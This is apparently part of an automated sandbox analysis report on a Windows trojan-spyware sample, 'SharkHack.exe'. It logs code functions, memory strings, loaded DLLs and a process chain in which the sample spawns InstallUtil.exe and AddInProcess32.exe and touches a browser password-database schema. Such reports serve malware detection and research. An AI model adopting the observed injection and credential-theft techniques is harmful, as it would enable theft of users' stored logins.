                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004229CD10_2_004229CD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004111E910_2_004111E9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043C1B010_2_0043C1B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043F1B010_2_0043F1B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00427A5A10_2_00427A5A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041D26010_2_0041D260
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00423A6010_2_00423A60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042C26C10_2_0042C26C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042CA3510_2_0042CA35
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042CAF110_2_0042CAF1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043F2F610_2_0043F2F6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040428010_2_00404280
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042C28210_2_0042C282
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043EA8010_2_0043EA80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042634010_2_00426340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042CB4C10_2_0042CB4C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042636010_2_00426360
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041936210_2_00419362
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041AB0010_2_0041AB00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043730010_2_00437300
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00427B0810_2_00427B08
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00432B1010_2_00432B10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043F33010_2_0043F330
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004073C010_2_004073C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00404BC010_2_00404BC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043F3C010_2_0043F3C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041C3CC10_2_0041C3CC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004393D010_2_004393D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00423BE010_2_00423BE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040EB8010_2_0040EB80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043FB8010_2_0043FB80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042238D10_2_0042238D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043F45010_2_0043F450
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00439C7010_2_00439C70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042847D10_2_0042847D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043BCE010_2_0043BCE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004384F010_2_004384F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00421C8010_2_00421C80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0044048010_2_00440480
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041DC9010_2_0041DC90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004274A510_2_004274A5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00427CB010_2_00427CB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043655410_2_00436554
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00432D7010_2_00432D70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040ED7510_2_0040ED75
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043150E10_2_0043150E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043C51010_2_0043C510
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041D53010_2_0041D530
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00414DC010_2_00414DC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00437DE010_2_00437DE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004065F010_2_004065F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00418DF110_2_00418DF1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042FDF910_2_0042FDF9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040AD9010_2_0040AD90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004095A010_2_004095A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00436DB210_2_00436DB2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041FE7C10_2_0041FE7C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043FE2010_2_0043FE20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00402ED010_2_00402ED0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040C6F010_2_0040C6F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040D6F810_2_0040D6F8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042BE8A10_2_0042BE8A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041DE9010_2_0041DE90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041874010_2_00418740
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00428F6C10_2_00428F6C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041477710_2_00414777
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004237D010_2_004237D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00417FE110_2_00417FE1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041EFE010_2_0041EFE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00416F8D10_2_00416F8D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042F7BC10_2_0042F7BC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00407EE0 appears 45 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00414110 appears 82 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6744 -s 984
                          Source: SharkHack.exe, 00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SharkHack.exe
                          Source: SharkHack.exe, 00000000.00000002.2889837559.0000000008980000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs SharkHack.exe
                          Source: SharkHack.exe, 00000000.00000002.2881426397.0000000005E70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMofInagitap.dll8 vs SharkHack.exe
                          Source: SharkHack.exe, 00000000.00000002.2860912420.0000000003D2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SharkHack.exe
                          Source: SharkHack.exe, 00000000.00000002.2850825306.0000000001C3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SharkHack.exe
                          Source: SharkHack.exe, 00000000.00000002.2875564569.0000000004999000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SharkHack.exe
                          Source: SharkHack.exe, 00000000.00000002.2860912420.0000000003991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SharkHack.exe
                          Source: SharkHack.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: SharkHack.exe, nf7qV5XWlBC.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, TRYKkNvh8fRn9U4uBi5.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, TRYKkNvh8fRn9U4uBi5.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, TRYKkNvh8fRn9U4uBi5.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, TRYKkNvh8fRn9U4uBi5.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TRYKkNvh8fRn9U4uBi5.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TRYKkNvh8fRn9U4uBi5.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TRYKkNvh8fRn9U4uBi5.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TRYKkNvh8fRn9U4uBi5.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.SharkHack.exe.5e70000.3.raw.unpack, Class12_Startup.csTask registration methods: 'CreateCanceledTask'
                          Source: 7.2.InstallUtil.exe.44e31f0.0.raw.unpack, Class12_Startup.csTask registration methods: 'CreateCanceledTask'
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/5@1/1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00438860 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,10_2_00438860
                          Source: C:\Users\user\Desktop\SharkHack.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SharkHack.exe.logJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6744
                          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0b50c193-2eca-4372-8db9-e5951a8f23e1Jump to behavior
                          Source: SharkHack.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: SharkHack.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          Source: C:\Users\user\Desktop\SharkHack.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: AddInProcess32.exe, 0000000A.00000002.2928100351.0000000003928000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: unknownProcess created: C:\Users\user\Desktop\SharkHack.exe "C:\Users\user\Desktop\SharkHack.exe"
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6744 -s 984
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\SharkHack.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: SharkHack.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: SharkHack.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: SharkHack.exeStatic file information: File size 7181824 > 1048576
                          Source: SharkHack.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x6b3800
                          Source: SharkHack.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: System.ni.pdbRSDS source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: \??\C:\Windows\InstallUtil.pdbK source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: n.pdbi source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: ((.pdb source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdbRSDS source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2929951548.0000000003409000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbl source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdbX source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: til.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.ni.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb1F source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdbp source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: mscorlib.pdb source: WER11DB.tmp.dmp.13.dr
